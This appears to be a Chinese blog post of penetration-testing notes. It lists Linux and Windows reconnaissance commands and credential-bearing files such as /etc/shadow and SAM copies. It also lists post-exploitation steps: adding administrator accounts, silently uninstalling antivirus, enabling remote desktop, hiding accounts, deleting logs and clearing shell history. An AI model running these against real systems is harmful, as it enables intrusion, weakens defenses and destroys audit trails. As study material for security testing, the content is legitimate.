渗透测试之提权:信息收集

一、基本信息收集

1、Linux 系统

/etc/resolv.conf  #查DNS设置

/etc/passwd  #查帐号

/etc/shadow    #查密码

whoami and who –a    #查当前账号及已登录的所有账号

ifconfig -a     #查IP相关信息

iptables -L     #查防火墙

netstat –rn    #查看当前系统网关以及路由设置,地址欺骗

uname –a    #查系统内核版本

ps aux        #查看进程

dpkg -l| head     #列出已安装的所有软件包(ii:该包已安装,r:该包已删除,c:配置文件还存在)

示例:

 

2、Windows 系统

ipconfig /all          #查看所有的IP配置

ipconfig /displaydns    #查看当前DNS缓存【可发现系统管理员经常浏览的网页】

netstat -bnao,netstat -r         #查看路由

net view,net view /domain   #查网络共享

net user /domain,net user %username% /domain    #域账号信息 

net accounts,net share    #查看所开的共享

net localgroup administrators username /add   #将username添加到本地管理员组

net group "Domain Controllers" /domain     #查看Domain Controllers里的主机账号/域控制器

net share name$=C:\ /unlimited     #将C盘共享出来,并不做限制(所有权限)

net user username /active:yes /domain     #域环境下,将锁定账号启动

示例:

 

3、windows平台下的命令工具

WMIC(WINDOWS MANAGEMENT INSTRUMENTATION)

wmic nicconfig get ipaddress,macaddress     #查询IP地址/mac地址

wmic computersystem get username    #当前登陆账号

wmic netlogin get name,lastlogon     #用户登录记录

wmic process get caption, executablepath,commandline      #查看当前进程与命令方式

wmic process where name=“calc.exe" call terminate           #结束一个进程【calc.exe计算器】

wmic os get name,servicepackmajorversion                     #提取操作系统服务版本

wmic product get name,version                                         #查看操作系统安装的软件

wmic product where name=“<name>” call uninstall /nointeractive    #删掉某些软件【如:杀毒软件】#nointeractive 后台静默运行

wmic share get /ALL                        #查看共享文件夹

wmic /node:"machinename" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"                           #开启远程桌面,支持本地、远程的执行

如:wmic /node:"localhost" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"

wmic nteventlog get path,filename, writeable        #查看当前系统日志对应哪些系统文件

eventvwr / eventvwr.msc   # 打开事件查看器

示例:

 

二、敏感信息收集

商业信息

系统信息(基本信息收集)

1、Linux

/etc ;/usr/local/etc  #一般存放有配置文件

/etc/password ;/etc/shadow

.ssh ;.gnupg 公私钥   #linux以.为首的目录/文件都是隐藏的,ls -ll 可查看

The e-mail and data files     #邮件/数据文件

业务数据库 ;身份认证服务器数据库

/tmp    #linux中的临时目录,存放临时数据【有可能泄露机密数据】

2、windows

SAM 数据库 ; 注册表文件

%SYSTEMROOT%\repair\SAM  #SAM进行修复操作时,保存的SAM副本

%SYSTEMROOT%\System32\config\RegBack\SAM  #注册表备份

业务数据库 ; 身份认证数据库

临时文件目录  #病毒经常驻留的地方

UserProfile\AppData\Local\Microsoft\Windows\Temporary Internet Files\

三、隐藏痕迹

1、Windows 

  禁止在登陆界面显示新建账号(username),此方法只能在登录界面隐藏,即该操作之后依旧可通过net user 查到,可通过其他方法使net user 也查不到。

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v username /T REG_DWORD /D 0

  del %WINDIR%\*.log /a/s/q/f    #静默强制删除日志

2、Linux

History               #查看曾经运行的命令【保存文件位置:bash_history】

history -c           #删除history记录

lsattr      #查看文件属性

chattr +i .bash_history         #修改文件属性为 i【i:无法修改】,如果不起作用可以将原来的bash_history文件删掉重新建个,再将 i 属性加上。

示例:

3、日志

 不同的linux系统,日志文件名称也许不一样。

auth.log / secure   #存放用户的登录及身分认证信息

btmp / wtmp    #数据文件

lastlog / faillog

其他日志和 HIDS 等

示例:

posted @ 2022-02-26 11:39  z9m8r8  阅读(91)  评论(0编辑  收藏  举报